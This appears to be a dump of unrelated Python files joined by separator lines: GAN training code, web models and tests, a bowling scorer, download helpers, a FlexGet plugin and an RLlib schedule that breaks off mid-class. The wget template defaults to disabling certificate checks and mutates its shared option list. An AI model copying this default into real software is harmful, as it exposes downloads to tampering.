        self.generator.train()
        self.discriminator.train()
        self.d_optimizer.zero_grad()

        reg_d = self.config['training']['regularize_output_d']

        # Proportional term on real data.
        d_real = self.discriminator(x_real, y)
        dloss_real = self.compute_loss(d_real, 1) * self.pv
        if reg_d > 0.:
            dloss_real += (d_real**2).mean() * reg_d
        dloss_real.backward()

        # On fake data
        with torch.no_grad():
            x_fake = self.generator(z, y)
        d_fake = self.discriminator(x_fake, y)
        dloss_fake = self.compute_loss(d_fake, 0) * self.pv
        if reg_d > 0.:
            dloss_fake += (d_fake**2).mean() * reg_d
        dloss_fake.backward()

        # Integral term: losses on samples replayed from the buffers.
        i_loss = torch.from_numpy(np.array([0.]))
        if self.iv > 0:
            # i_factor = self.config['training']['i_buffer_factor']
            # i_store = self.config['training']['i_buffer_onestep']
            xtmp = x_real.detach().cpu().numpy()
            ytmp = y.detach().cpu().numpy()
            self.i_real_queue.set_data(xtmp, ytmp)
            xtmp = x_fake.detach().cpu().numpy()
            ytmp = y.detach().cpu().numpy()
            self.i_fake_queue.set_data(xtmp, ytmp)

            i_xreal, i_yreal = self.i_real_queue.get_data()
            i_xfake, i_yfake = self.i_fake_queue.get_data()
            i_xreal = torch.as_tensor(i_xreal, dtype=torch.float32).cuda()
            i_xfake = torch.as_tensor(i_xfake, dtype=torch.float32).cuda()
            i_yreal = torch.as_tensor(i_yreal, dtype=torch.long).cuda()
            i_yfake = torch.as_tensor(i_yfake, dtype=torch.long).cuda()
            i_real_doutput = self.discriminator(i_xreal, i_yreal)
            i_loss_real = self.compute_loss(i_real_doutput, 1)
            i_fake_doutput = self.discriminator(i_xfake, i_yfake)
            i_loss_fake = self.compute_loss(i_fake_doutput, 0)
            if self.config['training']['pid_type'] == 'function':
                i_loss = (i_loss_real + i_loss_fake) * self.iv
            elif self.config['training']['pid_type'] == 'square':
                i_loss = ((i_real_doutput**2).mean() +
                          (i_fake_doutput**2).mean()) * self.iv
            elif self.config['training']['pid_type'] == 'abs':
                i_loss = (torch.abs(i_real_doutput).mean() +
                          torch.abs(i_fake_doutput).mean()) * self.iv
            elif self.config['training']['pid_type'] == 'accurate':
                # Only penalise outputs on the wrong side of zero.
                i_fake_doutput = self.max0(i_fake_doutput)
                i_real_doutput = -1 * self.max0(-1 * i_real_doutput)
                i_loss = (i_fake_doutput - i_real_doutput).mean() * self.iv
            i_loss.backward()

        # Derivative term: difference between current- and previous-batch
        # losses; the first invocation only records the snapshots.
        d_loss = torch.from_numpy(np.array([0.]))
        # print(self.dv)
        if self.dv > 0 and it > 0:
            if self.d_xfake is None:
                self.d_xreal = x_real
                self.d_xfake = x_fake
                self.d_previous_z = z
                self.d_previous_y = y
            else:
                d_loss_previous_f = self.compute_loss(
                    self.discriminator(self.d_xfake, self.d_previous_y), 0)
                d_loss_previous_r = self.compute_loss(
                    self.discriminator(self.d_xreal, self.d_previous_y), 1)
                d_loss_previous = d_loss_previous_f + d_loss_previous_r
                d_loss_current_f = self.compute_loss(
                    self.discriminator(x_fake, y), 0)
                d_loss_current_r = self.compute_loss(
                    self.discriminator(x_real, y), 1)
                d_loss_current = d_loss_current_f + d_loss_current_r
                d_loss = (d_loss_current - d_loss_previous) * self.dv
                d_loss.backward()

                self.d_xreal = x_real
                self.d_xfake = x_fake
                self.d_previous_z = z
                self.d_previous_y = y

        self.d_optimizer.step()
        toggle_grad(self.discriminator, False)

        # Output
        dloss = (dloss_real + dloss_fake)
        return dloss.item(), d_loss.item(), i_loss.item()

    def compute_loss(self, d_out, target, is_generator=False):
        """Per-gan_type loss of discriminator output d_out against target (0/1)."""
        targets = d_out.new_full(size=d_out.size(), fill_value=target)

        if self.gan_type == 'standard':
            loss = F.binary_cross_entropy_with_logits(d_out, targets)
        elif self.gan_type == 'wgan':
            loss = (2 * target - 1) * d_out.mean()
        elif self.gan_type == 'hinge':
            if is_generator is False:
                loss = (F.relu(1 + (2 * target - 1) * d_out)).mean()
            else:
                # NOTE(review): generator hinge loss has no leading minus
                # here -- sign convention assumed intentional; confirm.
                loss = ((2 * target - 1) * d_out).mean()
        elif self.gan_type == 'sigmoid':
            d_out = d_out * self.config['training']['sigmoid_coe']
            # Fixed: use torch.sigmoid instead of the deprecated F.sigmoid.
            loss = ((2 * target - 1) * torch.sigmoid(d_out)
                    ).mean() / self.config['training']['sigmoid_coe']
        elif self.gan_type == 'lsgan1':
            if is_generator is False:
                target = target * 2 - 1
                loss = ((d_out - target)**2).mean()
            else:
                loss = (d_out**2).mean()
        elif self.gan_type == 'lsgan2':
            target -= 0.5
            loss = ((d_out - target)**2).mean()
        else:
            raise NotImplementedError
        return loss

    def wgan_gp_reg(self, x_real, x_fake, y, center=1.):
        """WGAN-GP gradient penalty on random real/fake interpolates."""
        batch_size = y.size(0)
        eps = torch.rand(batch_size, device=y.device).view(batch_size, 1, 1, 1)
        x_interp = (1 - eps) * x_real + eps * x_fake
        x_interp = x_interp.detach()
        x_interp.requires_grad_()
        d_out = self.discriminator(x_interp, y)

        reg = (compute_grad2(d_out, x_interp).sqrt() - center).pow(2).mean()
        return reg


# Utility functions
def toggle_grad(model, requires_grad):
    """Enable/disable gradients for every parameter of model."""
    for p in model.parameters():
        p.requires_grad_(requires_grad)


def compute_grad2(d_out, x_in):
    """Squared gradient norm of d_out w.r.t. x_in, per batch element."""
    batch_size = x_in.size(0)
    grad_dout = autograd.grad(outputs=d_out.sum(),
                              inputs=x_in,
                              create_graph=True,
                              retain_graph=True,
                              only_inputs=True)[0]
    grad_dout2 = grad_dout.pow(2)
    assert (grad_dout2.size() == x_in.size())
    reg = grad_dout2.view(batch_size, -1).sum(1)
    return reg


def update_average(model_tgt, model_src, beta):
    """EMA update: tgt = beta * tgt + (1 - beta) * src, parameter-wise."""
    toggle_grad(model_src, False)
    toggle_grad(model_tgt, False)

    param_dict_src = dict(model_src.named_parameters())

    for p_name, p_tgt in model_tgt.named_parameters():
        p_src = param_dict_src[p_name]
        assert (p_src is not p_tgt)
        p_tgt.copy_(beta * p_tgt + (1. - beta) * p_src)
nilq/baby-python
python
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # pylint: disable=invalid-name, too-few-public-methods """wget template""" from __future__ import absolute_import from __future__ import unicode_literals from __future__ import print_function import logging # pylint: disable=unused-import import hpccm.base_object class wget(hpccm.base_object): """wget template""" def __init__(self, **kwargs): """Initialize wget template""" super(wget, self).__init__(**kwargs) self.wget_opts = kwargs.get('opts', ['-q', '-nc', '--no-check-certificate']) def download_step(self, outfile=None, referer=None, url=None, directory='/tmp'): """Generate wget command line string""" if not url: logging.error('url is not defined') return '' # Copy so not to modify the member variable opts = self.wget_opts if outfile: opts.append('-O {}'.format(outfile)) if referer: opts.append('--referer {}'.format(referer)) opt_string = ' '.join(self.wget_opts) # Add annotation if the caller inherits from the annotate template if callable(getattr(self, 'add_annotation', None)): self.add_annotation('url', url) # Ensure the directory exists return 'mkdir -p {1} && wget {0} -P {1} {2}'.format(opt_string, directory, url)
nilq/baby-python
python
from apps import db
from datetime import datetime


# Base mixin: adds creation/update timestamps to every table.
class BaseModel(object):
    # NOTE(review): default=datetime.now is evaluated at insert time;
    # update_time is not automatically refreshed on UPDATE (no onupdate=).
    create_time = db.Column(db.DateTime, default=datetime.now)
    update_time = db.Column(db.DateTime, default=datetime.now)


# Category table
class Cate(BaseModel, db.Model):
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(30))


# Product table
class Goods(BaseModel, db.Model):
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(30))
    price = db.Column(db.Integer)
    descrip = db.Column(db.String(255))     # short description
    content = db.Column(db.Text)            # full body text
    image_url = db.Column(db.String(100))
    number = db.Column(db.Integer)          # stock count
    cid = db.Column(db.Integer, db.ForeignKey('cate.id'))
    cate = db.relationship(Cate)


# User table
class User(BaseModel, db.Model):
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(30))
    password = db.Column(db.String(255))


# Shopping-cart table (denormalized: stores a copy of name/price at add time)
class Cart(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    good_id = db.Column(db.Integer)
    user_id = db.Column(db.Integer)
    name = db.Column(db.String(30), default='')
    price = db.Column(db.Integer)
    number = db.Column(db.Integer)


# Comment table
class Comment(BaseModel, db.Model):
    id = db.Column(db.Integer, primary_key=True)
    content = db.Column(db.String(30))
    user_id = db.Column(db.Integer, db.ForeignKey("user.id"))
    good_id = db.Column(db.Integer, db.ForeignKey("goods.id"))
    like_count = db.Column(db.Integer, default=0)
    user = db.relationship(User)


# 5. Create the migration repository
#    (this command creates the migrations folder; all migration files live there)
# python manage.py db init
# 6. Create a migration script
# python manage.py db migrate -m 'initialization'
# 7. Apply it to the database
# python manage.py db upgrade
nilq/baby-python
python
from decimal import Decimal
from simfile.ssc import SSCSimfile
import unittest

from .helpers import testing_timing_data
from .. import *
from simfile.sm import SMSimfile


class TestBeat(unittest.TestCase):
    """Round-trip tests for Beat's decimal-string parsing and formatting."""

    def test_from_str(self):
        # Parsed beats snap to common note subdivisions (192nds, 64ths, ...).
        self.assertEqual(Beat(0, 1), Beat.from_str('0.000'))
        self.assertEqual(Beat(12*3+1, 3), Beat.from_str('12.333'))
        self.assertEqual(Beat(4, 192), Beat.from_str('0.021'))
        self.assertEqual(Beat(4, 64), Beat.from_str('0.062'))
        self.assertEqual(Beat(4, 48), Beat.from_str('0.083'))
        self.assertEqual(Beat(4, 32), Beat.from_str('0.125'))
        self.assertEqual(Beat(4, 24), Beat.from_str('0.167'))
        self.assertEqual(Beat(4, 16), Beat.from_str('0.250'))
        self.assertEqual(Beat(4, 12), Beat.from_str('0.333'))
        self.assertEqual(Beat(4, 8), Beat.from_str('0.500'))

    def test_str(self):
        # Formatting uses three decimal places, the simfile convention.
        self.assertEqual('0.000', str(Beat(0, 1)))
        self.assertEqual('12.333', str(Beat(37, 3)))
        self.assertEqual('0.021', str(Beat(4, 192)))
        self.assertEqual('0.062', str(Beat(4, 64)))
        self.assertEqual('0.083', str(Beat(4, 48)))
        self.assertEqual('0.125', str(Beat(4, 32)))
        self.assertEqual('0.167', str(Beat(4, 24)))
        self.assertEqual('0.250', str(Beat(4, 16)))
        self.assertEqual('0.333', str(Beat(4, 12)))
        self.assertEqual('0.500', str(Beat(4, 8)))


class TestBeatValues(unittest.TestCase):
    """Tests for the 'beat=value,...' list format used by BPMS/STOPS fields."""

    def test_from_str(self):
        events = BeatValues.from_str('0.000=128.000,\n132.000=64.000,\n147.500=128.000')
        self.assertIsInstance(events[0].beat, Beat)
        self.assertIsInstance(events[0].value, Decimal)
        self.assertEqual(BeatValue(beat=Beat(0, 1), value=Decimal('128.000')), events[0])
        self.assertEqual(BeatValue(beat=Beat(132, 1), value=Decimal('64.000')), events[1])
        self.assertEqual(BeatValue(beat=Beat(147*2+1, 2), value=Decimal('128.000')), events[2])

    def test_serialize(self):
        # Serialization must reproduce the exact input string (round trip).
        events = BeatValues.from_str('0.000=128.000,\n132.000=64.000,\n147.500=128.000')
        self.assertEqual('0.000=128.000,\n132.000=64.000,\n147.500=128.000', events.serialize())


class TestTimingData(unittest.TestCase):
    """Tests for TimingData extraction from simfiles and SSC charts."""

    def test_attributes(self):
        timing_data = testing_timing_data()
        self.assertEqual(BeatValues([
            BeatValue(beat=Beat(0), value=Decimal('120.000')),
            BeatValue(beat=Beat(1), value=Decimal('150.000')),
            BeatValue(beat=Beat(2), value=Decimal('200.000')),
            BeatValue(beat=Beat(3), value=Decimal('300.000')),
        ]), timing_data.bpms)
        self.assertEqual(BeatValues([
            BeatValue(beat=Beat(2.5), value=Decimal('0.500')),
            BeatValue(beat=Beat(3), value=Decimal('0.100')),
        ]), timing_data.stops)
        self.assertEqual(BeatValues(), timing_data.delays)
        self.assertEqual(BeatValues(), timing_data.warps)
        self.assertEqual(Decimal('-0.009'), timing_data.offset)

    def test_from_simfile_with_ssc_chart_without_distinct_timing_data(self):
        # A chart with no chart-level timing falls back to simfile-level fields.
        with open('testdata/Springtime.ssc', 'r', encoding='utf-8') as infile:
            ssc = SSCSimfile(file=infile)
        ssc_chart = next(filter(
            lambda c: c.stepstype == 'pump-single' and c.difficulty == 'Hard',
            ssc.charts
        ))
        timing_data = TimingData.from_simfile(ssc, ssc_chart)
        self.assertEqual(BeatValues.from_str(ssc.bpms), timing_data.bpms)
        self.assertEqual(BeatValues.from_str(ssc.stops), timing_data.stops)
        self.assertEqual(BeatValues(), timing_data.warps)
        self.assertEqual(Decimal(ssc.offset), timing_data.offset)

    def test_from_simfile_with_ssc_chart_with_distinct_timing_data(self):
        # A chart carrying its own BPMS/STOPS/OFFSET overrides the simfile's.
        with open('testdata/Springtime.ssc', 'r', encoding='utf-8') as infile:
            ssc = SSCSimfile(file=infile)
        ssc_chart = next(filter(
            lambda c: c.stepstype == 'pump-single' and c.difficulty == 'Challenge',
            ssc.charts
        ))
        timing_data = TimingData.from_simfile(ssc, ssc_chart)
        self.assertEqual(BeatValues.from_str(ssc_chart['BPMS']), timing_data.bpms)
        self.assertEqual(BeatValues.from_str(ssc_chart['STOPS']), timing_data.stops)
        self.assertEqual(BeatValues(), timing_data.warps)
        self.assertEqual(Decimal(ssc_chart['OFFSET']), timing_data.offset)
nilq/baby-python
python
# Re-exported here for backwards compatibility with older import paths.
from ignite.utils import convert_tensor, apply_to_tensor, apply_to_type, to_onehot


def _to_hours_mins_secs(time_taken):
    """Split a duration in seconds into an (hours, mins, secs) triple."""
    total_mins, secs = divmod(time_taken, 60)
    hours, mins = divmod(total_mins, 60)
    return hours, mins, secs
nilq/baby-python
python
class ScoreCard:
    """Total-score calculator for a ten-pin bowling game.

    The score text uses '|' between frames, e.g.
    ``"X|5/|9-|...|X||XX"`` — ten frames, then an empty separator, then the
    bonus balls.  'X' is a strike, 'n/' a spare, '-' a miss.
    """

    def __init__(self, score_text: str):
        score_texts = score_text.split('|')
        self.normal_turns = [score_texts[i] for i in range(10)]
        # Bonus balls appear after an empty separator ("...||XX").  Default to
        # an empty list so games without bonus balls do not crash.
        # (BUG FIX: additional_turns was previously only assigned when bonus
        # balls were present, making all_turns raise AttributeError otherwise.)
        self.additional_turns = [score_texts[11]] if len(score_texts) >= 12 else []
        self.all_turns = self.normal_turns + self.additional_turns

    def to_score(self) -> int:
        """Return the total score of the game (0..300)."""
        total = 0
        for turn in range(len(self.normal_turns)):
            total = total + self.get_score_by_turn(turn)
        return total

    def get_score_by_turn(self, turn: int) -> int:
        """Score of one frame, including strike/spare bonus balls."""
        frame = self.normal_turns[turn]
        score = self.text_to_score(frame)
        if self.__is_strike(frame):
            return score + self.__get_bonus_score(turn, 2)  # strike: next two balls
        if self.__is_spare(frame):
            # BUG FIX: a spare's bonus is the next ONE ball, not two.
            return score + self.__get_bonus_score(turn, 1)
        return score

    def __get_bonus_score(self, turn: int, num_balls: int) -> int:
        """Pin count of the next `num_balls` balls after frame `turn`."""
        if turn + 1 == len(self.normal_turns):
            # Tenth frame: bonus balls come from the extra roll(s).
            return self.text_to_score(self.additional_turns[0][0:num_balls])
        # Concatenate the following frames' balls; list slicing cannot raise
        # IndexError even when the bonus-ball entry is absent.
        following = ''.join(self.all_turns[turn + 1:turn + 3])
        return self.text_to_score(following[0:num_balls])

    def text_to_score(self, score_text: str) -> int:
        """Pin count of a frame/ball string; a spare ('n/') is a full 10."""
        if score_text.find('/') == 1:
            return 10
        score = 0
        for i in range(len(score_text)):
            score = score + self.__char_to_score(score_text[i])
        return score

    def __char_to_score(self, score_text: str) -> int:
        """Pin count of a single ball character ('X', '-' or a digit)."""
        if self.__is_strike(score_text):
            return 10
        elif score_text == '-':
            return 0
        else:
            return int(score_text)

    def __is_strike(self, score_text: str) -> bool:
        return score_text.upper() == 'X'

    def __is_spare(self, score_text: str) -> bool:
        return score_text.find('/') == 1
nilq/baby-python
python
import os
import cgi

import requests
import shutil


def download_file(url, path, file_name=None):
    """Download file from url to directory

    URL is expected to have a Content-Disposition header telling
    us what filename to use.

    Returns filename of downloaded file.

    Raises ValueError on a non-200 response or when no filename can be
    determined from the Content-Disposition header.
    """
    res = requests.get(url, stream=True)
    if res.status_code != 200:
        raise ValueError('Failed to download')

    if file_name is None:
        # NOTE(review): cgi.parse_header is deprecated and removed in
        # Python 3.13 (PEP 594); consider email.message for new code.
        params = cgi.parse_header(
            res.headers.get('Content-Disposition', ''))[-1]
        # Only the RFC 5987 'filename*' form is handled; a plain
        # 'filename=' parameter would raise here — presumably intended,
        # but confirm against the servers this is used with.
        if 'filename*' not in params:
            raise ValueError('Could not find a filename')
        file_name = params['filename*'].replace("UTF-8''", "")

    # basename() guards against path traversal in the server-supplied name.
    abs_path = os.path.join(path, os.path.basename(file_name))

    with open(abs_path, 'wb') as target:
        # Let urllib3 decode gzip/deflate before copying raw bytes to disk.
        res.raw.decode_content = True
        shutil.copyfileobj(res.raw, target)
    print(f"Download {file_name}")
nilq/baby-python
python
# Entry point: resize images via controllerImg using the CLI arguments.
from lib.getItensFromEntrance import getItens  # NOTE(review): imported but unused here
from lib.controllerImage import controllerImg
import os
import sys

# Full argv (including the script name) is forwarded to the controller.
arguments = sys.argv
pathDirect = os.getcwd()

resizeImage = controllerImg(pathDirect, arguments)
resizeImage.resizeImage()
nilq/baby-python
python
from django.test import TestCase
from .models import Location, Category, Photographer, Image

# Create your tests here.


class LocationTestClass(TestCase):
    """Model tests for Location."""

    def setUp(self):
        self.loc = Location(location_name = 'Mombasa, Kenya')

    # Testing instance
    def test_instance(self):
        self.assertTrue(isinstance(self.loc, Location))

    def test_save_location(self):
        self.loc.save_location()
        locations = Location.objects.all()
        self.assertTrue(len(locations) > 0)

    def test_delete_location(self):
        self.loc.save_location()
        Location.delete_location(self.loc.id)
        locations = Location.objects.all()
        self.assertEqual(len(locations), 0)

    def test_update_location(self):
        # BUG FIX: the object must be saved first, and the assertion must
        # re-fetch from the DB — the class-level update cannot mutate the
        # stale in-memory instance held in self.loc.
        self.loc.save_location()
        Location.update_location(self.loc.id, 'london')
        self.assertEqual(Location.objects.get(id=self.loc.id).location_name, 'london')


class CategoryTestClass(TestCase):
    """Model tests for Category."""

    def setUp(self):
        self.cat = Category(category_name = 'official')

    # Testing instance
    def test_instance(self):
        self.assertTrue(isinstance(self.cat, Category))

    def test_save_category(self):
        self.cat.save_category()
        categories = Category.objects.all()
        self.assertTrue(len(categories) > 0)

    def test_delete_category(self):
        self.cat.save_category()
        Category.delete_category(self.cat.id)
        categories = Category.objects.all()
        self.assertEqual(len(categories), 0)

    def test_update_category(self):
        # BUG FIX: the original updated to 'official' but asserted 'joking',
        # and compared against the stale in-memory object.
        self.cat.save_category()
        Category.update_category(self.cat.id, 'joking')
        self.assertEqual(Category.objects.get(id=self.cat.id).category_name, 'joking')


class PhotographerTestClass(TestCase):
    """Model tests for Photographer."""

    def setUp(self):
        self.pho = Photographer(names = 'Fatma Fuaad', email = 'fatmafuaad23@gmail.com', ig = 'fatmafuaad', phone_number = '0712345678')

    # Testing instance
    def test_instance(self):
        self.assertTrue(isinstance(self.pho, Photographer))

    def test_save_photographer(self):
        self.pho.save_photographer()
        photographers = Photographer.objects.all()
        self.assertTrue(len(photographers) > 0)

    def test_delete_photographer(self):
        self.pho.save_photographer()
        Photographer.delete_photographer(self.pho.id)
        photographers = Photographer.objects.all()
        self.assertEqual(len(photographers), 0)


class ImageTestClass(TestCase):
    """Model tests for Image, with its foreign-key fixtures."""

    def setUp(self):
        self.loc = Location(location_name = 'Mombasa, Kenya')
        self.loc.save_location()
        self.cat = Category(category_name = 'official')
        self.cat.save_category()
        self.pho = Photographer(names = 'Fatma Fuaad', email = 'fatmafuaad23@gmail.com', ig = 'fatmafuaad', phone_number = '0712345678')
        self.pho.save_photographer()
        self.img = Image(image_path = 'fuaad.png', name = 'passport photo', description = 'photo fo passports', location = self.loc, category = self.cat, photographer = self.pho)

    def tearDown(self):
        Location.objects.all().delete()
        Category.objects.all().delete()
        Photographer.objects.all().delete()
        Image.objects.all().delete()

    # Testing instance
    def test_instance(self):
        self.assertTrue(isinstance(self.img, Image))

    def test_save_image(self):
        self.img.save_image()
        images = Image.objects.all()
        self.assertTrue(len(images) > 0)

    def test_delete_image(self):
        self.img.save_image()
        Image.delete_image(self.img.id)
        images = Image.objects.all()
        self.assertEqual(len(images), 0)

    def test_get_image_by_id(self):
        self.img.save_image()
        image = Image.get_image_by_id(self.img.id)
        self.assertEqual(self.img, image)

    def test_search_image(self):
        # BUG FIX: assertEqual() was called with a single argument, which is
        # a TypeError at runtime.  Assert the search found something instead.
        # NOTE(review): confirm search_image's exact return type.
        self.img.save_image()
        results = Image.search_image(self.img.category)
        self.assertTrue(results)

    def test_filter_by_location(self):
        # BUG FIX: same single-argument assertEqual() as above.
        self.img.save_image()
        results = Image.filter_by_location(self.img.location)
        self.assertTrue(results)

    def test_update_image(self):
        # BUG FIX: save first, then verify against a fresh DB fetch.
        self.img.save_image()
        Image.update_image(self.img.id, 'fatma.png')
        self.assertEqual(Image.get_image_by_id(self.img.id).image_path, 'fatma.png')
nilq/baby-python
python
#!/usr/bin/env python
"""cut(1)-style filter: print the Nth whitespace-separated field of each
stdin line (N is the first CLI argument, 1-based).  Lines with fewer
fields are silently skipped."""
import sys

field = int(sys.argv[1])

for i in sys.stdin:
    try:
        print(i.split()[field - 1], end=" ")
        print()
    except IndexError:
        # BUG FIX: was a bare `except:` that swallowed every error
        # (including KeyboardInterrupt); only a short line should be skipped.
        pass
nilq/baby-python
python
"""maillinter uses setuptools based setup script.

For the easiest installation type the command:

    python3 setup.py install

In case you do not have root privileges use the following command instead:

    python3 setup.py install --user

This installs the library and automatically handle the dependencies.
"""
import setuptools

# Long description for PyPI is taken verbatim from the README.
with open("README.md") as fp:
    long_description = fp.read()

setuptools.setup(
    name="maillinter",
    # Version is derived from git tags via setuptools_scm and written to the
    # package so runtime code can read it.
    use_scm_version={"write_to": "src/maillinter/_version.py"},
    description="The e-mail content formatter.",
    long_description=long_description,
    keywords="automation mail linter formatting",
    author="Velibor Zeli",
    author_email="zeli.velibor@gmail.com",
    url="https://github.com/vezeli/maillinter",
    license="MIT",
    # src/ layout: packages live under src/maillinter.
    package_dir={"": "src"},
    packages=setuptools.find_packages(where="src"),
    setup_requires=["setuptools_scm"],
    install_requires=["nltk", "pyperclip", "setuptools_scm"],
    entry_points={"console_scripts": ["maillinter = maillinter.scripts.__main__:cli"]},
    classifiers=[
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3 :: Only",
        "Operating System :: OS Independent",
        "Topic :: Communications :: Email",
    ],
)
nilq/baby-python
python
import logging
import re
import os
import sys

from flexget import plugin
from flexget import validator

log = logging.getLogger('rtorrent_magnet')
# Extracts the info-hash from a magnet URI's xt=urn:btih:<hash> component.
pat = re.compile('xt=urn:btih:([^&/]+)')


class PluginRtorrentMagnet(object):
    """
    Process Magnet URI's into rtorrent compatible torrent files

    Magnet URI's will look somethign like this:

    magnet:?xt=urn:btih:190F1ABAED7AE7252735A811149753AA83E34309&dn=URL+Escaped+Torrent+Name

    rTorrent would expect to see something like meta-URL_Escaped_Torrent_Name.torrent

    The torrent file must also contain the text:

    d10:magnet-uri88:xt=urn:btih:190F1ABAED7AE7252735A811149753AA83E34309&dn=URL+Escaped+Torrent+Namee

    This plugin will check if a download URL is a magnet link, and then create the appropriate torrent file.

    Example:
      rtorrent_magnet: ~/torrents/
    """

    def write_torrent_file(self, task, entry):
        """Write the bencoded magnet stub file and record it in entry['output']."""
        path = os.path.join(
            entry['path'],
            'meta-%s.torrent' % entry['title'].encode(sys.getfilesystemencoding(), 'replace')
        )
        path = os.path.expanduser(path)
        log.info('Writing rTorrent Magnet File: %s', path)

        # rTorrent reads a bencoded dict with a single 'magnet-uri' key.
        # Build it once so the test-mode log and the real write cannot drift.
        # (Also: use len() instead of calling __len__() directly, and drop the
        # no-op `f.closed` statement — `with` already closes the file.)
        content = 'd10:magnet-uri%d:%se' % (len(entry['url']), entry['url'])

        if task.manager.options.test:
            log.info('Would write: %s' % content)
        else:
            with open(path, 'w') as f:
                f.write(content)

        entry['output'] = path

    def validator(self):
        root = validator.factory()
        root.accept('path', allow_replacement=True)
        return root

    # Low priority so other output plugins get a chance to claim the entry first.
    @plugin.priority(0)
    def on_task_output(self, task, config):
        for entry in task.accepted:
            if 'output' in entry:
                log.debug('Ignoring, %s already has an output file: %s' % (entry['title'], entry['output']))
                continue

            urls = entry.get('urls', [entry['url']])
            for url in urls:
                if url.startswith('magnet:'):
                    log.debug('Magnet URI detected for url %s (%s)' % (url, entry['title']))
                    m = pat.search(url)
                    if m:
                        entry['url'] = url
                        entry['path'] = entry.get('path', config)
                        entry['hash'] = m.groups()[0]
                        log.debug('Magnet Hash Detected: %s' % entry['hash'])
                        self.write_torrent_file(task, entry)
                        break
                    else:
                        log.warning('Unrecognized Magnet URI Format: %s', url)


plugin.register_plugin(PluginRtorrentMagnet, 'rtorrent_magnet', api_ver=2)
nilq/baby-python
python
from collections import OrderedDict
from os.path import dirname, join

from library.commands.nvidia import NvidiaSmiCommand
from library.commands.sensors import SensorsCommand

# Paths resolved relative to this config module's location.
ROOT_DIR = dirname(__file__)
DATA_FOLDER = join(ROOT_DIR, "data")

# Probe commands executed by the monitor.
COMMANDS = [
    SensorsCommand,
    NvidiaSmiCommand
]

# How far to look back in the
ALERT_TIMEFRAME_MINUTES = 5

# Number of alert to trigger sending an email
ALERTS_NB_MAIL_TRIGGER = 5

# Difference from baseline level where a mail should be sent.
# Each entry maps level name -> [multiplier over baseline, display colour];
# ordered most-severe first so the first matching threshold wins.
WARNING_LEVELS = OrderedDict({
    "CRIT": [1.30, "red"],
    "HIGH": [1.15, "orange"],
    "WARM": [1.10, "yellow"]
})

# Default alerting level names
DEFAULT_LEVEL = "NORM"
FAIL_LEVEL = "FAIL"

# Default alerting file
ALERTS = {
    "recipient": "fist.last@mail.ext",
    "subject": join(ROOT_DIR, "mail/headers.txt"),
    "content": join(ROOT_DIR, "mail/content.html"),
}
nilq/baby-python
python
# Read two grades from the user and print their average to one decimal place.
# (Prompts/output are intentionally in Portuguese.)
n1 = float(input("Digite uma nota: "))
n2 = float(input("Digite a outra nota: "))
media = (n1 + n2)/2
print("A média das notas {:.1f} e {:.1f} é {:.1f}".format(n1, n2, media))
nilq/baby-python
python
'''def do_twice(f):
    f()
    f()

def print_spam():
    print('spam')

do_twice(print_spam)
'''

s = input('input string: ')


def do_twice(function, a):
    """Call `function` with argument `a` twice."""
    function(a)
    function(a)


def print_twice(a):
    """Print `a` on two consecutive lines."""
    print(a)
    print(a)


def do_four(function, a):
    """Call `function(a)` four times, via two do_twice calls."""
    do_twice(function, a)
    do_twice(function, a)


do_twice(print_twice, s)    # first part (exercise steps 1-4): prints s 4 times
print('')
do_four(print, s)           # step 5
nilq/baby-python
python
"""Module with implementation of utility classess and functions."""

# Re-export the package's utility helpers, argument-parser helpers and
# stopping-condition exceptions under a single flat namespace.
from WeOptPy.util.utility import (
    full_array,
    objects2array,
    limit_repair,
    limit_invers_repair,
    wang_repair,
    rand_repair,
    reflect_repair,
    explore_package_for_classes
)
from WeOptPy.util.argparser import (
    make_arg_parser,
    get_args,
    get_dict_args
)
from WeOptPy.util.exception import (
    FesException,
    GenException,
    TimeException,
    RefException
)

# Public API of WeOptPy.util.
__all__ = [
    'full_array',
    'objects2array',
    'limit_repair',
    'limit_invers_repair',
    'wang_repair',
    'rand_repair',
    'reflect_repair',
    'make_arg_parser',
    'get_args',
    'get_dict_args',
    'FesException',
    'GenException',
    'TimeException',
    'RefException',
    'explore_package_for_classes'
]

# vim: tabstop=3 noexpandtab shiftwidth=3 softtabstop=3
nilq/baby-python
python
from typing import Optional

from ray.rllib.utils.annotations import override
from ray.rllib.utils.framework import try_import_tf, try_import_torch
from ray.rllib.utils.schedules.schedule import Schedule
from ray.rllib.utils.typing import TensorType

tf1, tf, tfv = try_import_tf()
torch, _ = try_import_torch()


class PolynomialSchedule(Schedule):
    """Polynomial interpolation between `initial_p` and `final_p`.

    Over `schedule_timesteps`. After this many time steps, always returns
    `final_p`.
    """

    def __init__(self,
                 schedule_timesteps: int,
                 final_p: float,
                 framework: Optional[str],
                 initial_p: float = 1.0,
                 power: float = 2.0):
        """Initializes a PolynomialSchedule instance.

        Args:
            schedule_timesteps: Number of time steps for which to linearly
                anneal initial_p to final_p
            final_p: Final output value.
            framework: The framework descriptor string, e.g. "tf",
                "torch", or None.
            initial_p: Initial output value.
            power: The exponent to use (default: quadratic).
        """
        super().__init__(framework=framework)
        assert schedule_timesteps > 0
        self.schedule_timesteps = schedule_timesteps
        self.final_p = final_p
        self.initial_p = initial_p
        self.power = power

    @override(Schedule)
    def _value(self, t: TensorType) -> TensorType:
        """Returns the result of:
        final_p + (initial_p - final_p) * (1 - `t`/t_max) ** power
        """
        if self.framework == "torch" and torch and isinstance(t, torch.Tensor):
            # Integer tensors would otherwise truncate the division below.
            t = t.float()
        # Clamp so the output stays at final_p past the schedule's end.
        # NOTE(review): builtin min() on a tensor assumes `t` is scalar
        # (0-dim) — confirm callers never pass batched timesteps.
        t = min(t, self.schedule_timesteps)
        return self.final_p + (self.initial_p - self.final_p) * (
            1.0 - (t / self.schedule_timesteps))**self.power

    @override(Schedule)
